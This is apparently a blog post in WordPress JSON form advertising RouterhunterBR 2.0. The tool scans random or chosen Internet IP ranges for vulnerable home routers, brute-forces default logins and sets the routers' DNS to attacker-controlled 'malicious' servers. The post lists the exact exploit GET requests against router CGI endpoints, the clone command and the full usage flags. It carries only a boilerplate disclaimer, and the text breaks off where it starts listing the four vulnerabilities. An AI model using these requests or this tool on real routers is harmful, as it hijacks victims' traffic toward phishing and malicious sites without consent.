{"id":2733,"date":"2016-02-03T02:18:58","date_gmt":"2016-02-03T02:18:58","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=2733"},"modified":"2016-02-03T02:18:58","modified_gmt":"2016-02-03T02:18:58","slug":"routerhunter-2-0-a-tool-used-to-find-vulnerable-routers-and-devices-on-the-internet-and-perform-tests","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=2733","title":{"rendered":"Routerhunter 2.0 – A tool used to find vulnerable routers and devices on the Internet and perform tests"},"content":{"rendered":"

The RouterhunterBR<\/strong> is an automated security tool que finds vulnerabilities and performs tests on routers and vulnerable devices on the Internet. TheRouterhunterBR<\/b> was designed to run over the Internet looking for defined ips tracks or random in order to automatically exploit the vulnerability DNSChanger<\/b>on home routers.
\nThe<\/span> DNSChanger<\/span><\/b> is a trojan<\/span> able to direct<\/span> user requests<\/span> to<\/span> illegal<\/span> sites.<\/span> In practice<\/span>, this malware has the<\/span> ability to change<\/span> the DNS settings<\/span> of our machine<\/span>redirecting<\/span> the user to<\/span> sites<\/span> with<\/span> malicious purposes<\/span>. Imagine<\/span> for example<\/span> that your system<\/span> is infected with<\/span> this malware<\/span>, what might<\/span> happen is that the<\/span> user<\/span> to<\/span>access a particular<\/span> site<\/span> (eg<\/span>. Facebook.com<\/span><\/span>) may be<\/span> forwarded to<\/span> an unsolicited<\/span>website and<\/span> potentially<\/span> illegal.<\/span><\/span><\/p>\n

           _           _           _                \n  ___ ___ _ _| |_ ___ ___| |_ _ _ ___| |_ ___ ___ \n |  _| . | | |  _| -_|  _|   | | |   |  _| -_|  _|\n |_| |___|___|_| |___|_| |_|_|___|_|_|_| |___|_|\n                       BR - v2.0\n Tool used to find vulnerable routers and devices on the Internet and perform tests.\n[ Coded by Jhonathan Davi a.k.a jh00nbr - jhoonbr at protonmail.ch ]\n[ fb.com\/JhonVipNet - twitter.com\/jh00nbr - github.com\/jh00nbr\/ - blog.inurl.com.br - www.youtube.com\/c\/Mrsinisterboy ]\n[!] legal disclaimer: Usage of RouterHunterBR for attacking targets without prior mutual \nconsent is illegal. It is the end user's responsibility to obey all applicable local, state and \nfederal laws.Developers assume no liability and are not responsible for any misuse or damage caused\nby this program.  \n<\/pre>\n
GET’s:<\/strong><\/p>\n
\/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1\u2033\n\/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsIfcsList=&dnsRefresh=1\u2033\n\/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=\u201d\n\/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1\u2033\n\/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4\n\/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP\u201d\n<\/pre>\n
Installation:<\/strong><\/p>\n
git clone https:\/\/github.com\/jh00nbr\/Routerhunter-2.0.git\n<\/pre>\n
Usage:<\/strong><\/p>\n
\n-range 192.168.1.0-255, --range 192.168.1.0-255  Set range of IP\n  -bruteforce, --bruteforce                        Performs brute force with users and passwords standards, and soon    after defines the malicious DNS.\n  -startip 192.168.*.*, --startip 192.168.*.*      Start - IP range customized with wildcard \/ 201.*.*.*\n  -endip 192.168.*.*, --endip 192.168.*.*          End - IP range customized with wildcard \/ 201.*.*.*\n  -dns1 8.8.8.8, --dns1 8.8.8.8                    Define malicious dns1\n  -dns2 8.8.4.4, --dns2 8.8.4.4                    Define malicious dns2\n  --threads 10                                     Set threads numbers\n  -rip, --randomip                                 Randomizing ips routers\n  -lmtip 10, --limitip 10                          Define limite random ip\n<\/pre>\n
Commads:<\/strong><\/p>\n
\u2013range  201.12.50.0-255\nWill set IP range that will be scanned\n\u2013bruteforce\nBrute force with users and passwords on routers that requires authentication, forcing alteration of dns.\n \u2013startip \/ \u2013endip\nYou can customize the IP range with a wildcard \/ Example: \u2013startip 201.*.*.* \u2013endip 201.*.*.*\n\u2013dns1 8.8.8.8 \/ \u2013dns2 8.8.4.4\nServer primary and secondary dns malicious, that anger is listening for requests and will perform the redirection of pages\n\u2013threads 10\nSet threads numbers\n\u2013randomip\nRandomizing ips routers\n  \u2013limitip 10\nDefine limite random ip\n<\/pre>\n
The script explores four vulnerabilities in routers:<\/strong><\/p>\n